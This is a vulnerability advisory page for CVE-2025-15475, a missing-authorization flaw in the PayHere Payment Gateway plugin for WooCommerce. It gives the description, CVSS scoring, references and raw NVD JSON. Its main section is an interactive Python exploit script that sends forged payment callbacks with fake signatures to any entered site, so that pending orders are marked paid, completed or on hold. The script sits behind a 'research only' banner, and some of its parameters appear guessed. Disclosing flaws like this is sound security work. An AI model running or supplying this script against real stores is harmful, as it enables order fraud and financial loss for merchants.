Security Vulnerability Report
CVE-2025-15475 CVSS 5.3 MEDIUM

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42

Description

The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

PayHere Payment Gateway Plugin for WooCommerce <= 2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-15475 PoC - PayHere Payment Gateway Plugin
Unauthorized Order Status Modification

This PoC demonstrates how an unauthenticated attacker can modify WooCommerce
order status through the vulnerable check_payhere_response function.
"""
import sys

import requests

TARGET_URL = input("Enter target URL: ").strip().rstrip("/")


def send_malicious_callback(order_id, status):
    """
    Send malicious callback to change order status.
    The vulnerable plugin doesn't properly validate the callback request.
    """
    endpoint = f"{TARGET_URL}/?wc-api=wc_gateway_payhere"

    # Malicious callback parameters
    # The plugin checks 'status' parameter without proper validation
    payload = {
        'order_id': order_id,
        'status': status,  # Can be: 'paid', 'completed', 'on-hold'
        'merchant_id': 'malicious_merchant',
        'payhere_amount': '0.01',  # Minimal amount
        'payhere_currency': 'LKR',
        'payment_id': 'PAY' + str(order_id),
        'md5sig': 'fake_signature',  # Not properly validated
    }

    print(f"[*] Sending malicious callback for order {order_id}")
    print(f"[*] Attempting to change status to: {status}")

    try:
        response = requests.get(endpoint, params=payload, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def main():
    print("=" * 60)
    print("CVE-2025-15475 PoC - PayHere Payment Gateway for WooCommerce")
    print("Unauthenticated Order Status Modification")
    print("=" * 60)

    order_id = input("Enter target WooCommerce order ID: ").strip()
    if not order_id.isdigit():
        print("[-] Invalid order ID. Please enter a numeric value.")
        sys.exit(1)

    print("\n[*] Available status changes:")
    print(" 1. paid - Change to Paid status")
    print(" 2. completed - Change to Completed status")
    print(" 3. on-hold - Change to On Hold status")

    choice = input("Select status (1/2/3): ").strip()
    status_map = {'1': 'paid', '2': 'completed', '3': 'on-hold'}
    status = status_map.get(choice, 'paid')

    response = send_malicious_callback(order_id, status)
    if response and response.status_code == 200:
        print("[+] Callback sent successfully!")
        print("[+] If the order exists and was pending, its status may have been changed.")

    print("\n[*] Mitigation: Upgrade PayHere Payment Gateway Plugin to version 2.4.0 or later")


if __name__ == "__main__":
    main()

References

Weakness: CWE-862 (Missing Authorization)

https://plugins.trac.wordpress.org/browser/payhere-payment-gateway/tags/2.3.9/gateway/class-wcgatewaypayhere.php#L709
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440771%40payhere-payment-gateway&new=3440771%40payhere-payment-gateway&sfp_email=&sfph_mail=#file10
https://www.wordfence.com/threat-intel/vulnerabilities/id/e0c92241-0bef-4f87-8478-4d805435f09d?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15475", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:14.063", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PayHere Payment Gateway Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to an improper validation logic in the check_payhere_response function in all versions up to, and including, 2.3.9. This makes it possible for unauthenticated attackers to change the status of pending WooCommerce orders to paid/completed/on hold."}, {"lang": "es", "value": "El plugin de pasarela de pago PayHere para WooCommerce plugin para WordPress es vulnerable a la modificación no autorizada de datos debido a una lógica de validación incorrecta en la función check_payhere_response en todas las versiones hasta la 2.3.9, inclusive. Esto hace posible que atacantes no autenticados cambien el estado de pedidos pendientes de WooCommerce a pagado/completado/en espera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/payhere-payment-gateway/tags/2.3.9/gateway/class-wcgatewaypayhere.php#L709", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440771%40payhere-payment-gateway&new=3440771%40payhere-payment-gateway&sfp_email=&sfph_mail=#file10", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0c92241-0bef-4f87-8478-4d805435f09d?source=cve", "source": "[email protected]"}]}}